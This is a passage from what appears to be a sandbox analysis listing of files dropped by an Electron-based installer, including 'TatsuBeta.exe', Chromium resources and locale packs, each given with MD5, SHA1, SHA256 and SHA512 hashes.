SHA512 f73d631d1b4ee0bd8c83fe3f28e8b81747b2642f3314954c1447926674d71890add54a04164d10bfeaa39073af182bf11b121e67ef99055fe5c47cdd0db39ed4

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\icudtl.dat

MD5 7128d70133016bd6717e8c83d052081f
SHA1 e40003d2de0bc075b3ed2ff3f489f80d93be2349
SHA256 093ba5c4086b98e74128c3bd7aa35b81b9bddb0d39d4b19c0c792fdb1a1755b6
SHA512 0baff56b96b9fe0b8b3ed889433c87316f54125204054d198398d942cf345c46e1ef9014c3ef68caae0b97c399d83267934f89ef106f1c0bc9997b52614f2707

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\LICENSES.chromium.html

MD5 96aad5afa9414183bac7b5ba0e887364
SHA1 d43f4b6b88c9effb4cd2f08f6ec39f1975f32163
SHA256 c57600efc84f89e1d63367a044b874b06e2516431bdc57bdc4d9c6d92f7ba354
SHA512 e01ddcd8453c33b9d7d9fa018a1033d1b6f98242fd39ac8ac2b116bf4a71d248a8bd92ed7d8c4f8c8c048be0ec476916940b81e92cc6ed6d084163d185797002

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources.pak

MD5 7b602b83d217b099dc7770ea129b532d
SHA1 b32a1fdeb5459cfaea880596a695b487bc3f6163
SHA256 f76bf091bfcb59b4b170ae442fd86c87dcee488230e25d5241b44f1404826b5c
SHA512 954ef440e2f90cdddc351892864337626a44a2d61589cd112546325973cf31261ddcd3f34f405ad727d78e40193b36922a7d0ba5fc4a3f60aa252cee37b2ae60

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\snapshot_blob.bin

MD5 753313d67a77bdd897a9b4c0ebb35d05
SHA1 e426d70e06bcfe76599db33d9d39f8315440d0b8
SHA256 71c4864f87347a89df851326cd65d8a087e121b6e8f1972418fb79248477d6a4
SHA512 736ed0e474cb2729c15e225d02ee588cbddfe1b7a40aa397170de05b1049d3c7930dd0de777c891dee22fcec3a81566c7beab5269ed414c4f9efc939412bc228

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\v8_context_snapshot.bin

MD5 358f6a0a5f15c1eef0c97107e6871fae
SHA1 274c18522dee318e65c9f99b7f9d9bd793eac2c9
SHA256 39b140fe03e089ce73794e94495fe57d86146991182eb31257db4a486de34fdd
SHA512 5e310fa19c2e7020ff9be94c39cb9061b3c47a412481cc48902a368781be64e674d6135856ad1df3f518b38e387ab973e90ceb89ae635ea5c1063220b90dcf3a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vk_swiftshader.dll

MD5 82287d8c9aafd1e1a6cd67ee902571d1
SHA1 3cd03bb9e0ba2dafdbd9f8afb100f106d3f5c205
SHA256 34bbfa7b10741926a64e1f738f51f5b44fadc03bd580f5ed4e893782599638fb
SHA512 4b1e46424d17b2134b2844a2b8b54672d73270130788ffc896a5a9c765ab3c2da78abd28583f29b1ebb6b73b8bcfad8e4a1f98e1b73b1a8a9fd90bf3f9ed367f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\TatsuBeta.exe

MD5 c29326dd42b6c3ea55411bd8d700d6bc
SHA1 edea90f75edcfd7d8bd306655596ca6ac53ade43
SHA256 bfae3c689d3b060219f58bbc5b3dbb13eaf1802623b90c232460996de3f41921
SHA512 298138e947fec9e1f9ee649c77d26bdf859c900c9d4400a6e98b2312c30a627799dc9828e767268d40430b1e601e2b7db12e8efc865bf8bd6c81f8a2cf41f506

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\vulkan-1.dll

MD5 a19d9d147e1abe091baf9e543b082b1e
SHA1 cbe798b96834f10276b174fd0a72ff10c9722e36
SHA256 183a395557c59cb912e7ec3892d433fe883dde145fe2247fc50d5e4b96a5b5eb
SHA512 11c216a90bddd73097245fdd6fe36d597f0d1ef89cd717c2f2ae27d01735ca3fdf48289ec00e04c01e60f53d9238eac1fb385ff23d8cff18e7448a2f1cf98e42

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\el.pak

MD5 01a663d770835b689a06be6e27928360
SHA1 eca9260c1016b69f727260b419a8bbfd23d259ad
SHA256 7a26b0d99b166aa0293e75661586cbf9067e4fcb250ea6b7aa7aef70c6f4730a
SHA512 db3a7813d821c024710fbea75416ce20ce2402e2e8c351f35f5bb150fd841eb55a312924042bdb59440539e1a5fec295be067bec3934bd8b61124c0f3cea1b4f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
